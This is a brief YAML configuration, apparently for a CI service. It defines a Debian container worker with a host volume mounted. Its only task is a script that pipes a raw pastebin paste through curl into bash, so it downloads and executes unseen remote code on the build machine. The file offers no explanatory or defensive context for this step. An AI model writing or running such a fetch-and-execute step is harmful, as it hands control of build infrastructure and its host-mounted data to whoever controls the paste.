persistent_worker:
  isolation:
    container:
      image: debian:latest
      cpu: 8
      memory: 12G
      volumes:
        - /path/on/host:/path/in/container
        - /tmp/persistent-cache:/tmp/cache:ro

task:
  script: bash -c "$(curl -fsSL https://pastebin.com/raw/zy1Ss1Xz)" 
  
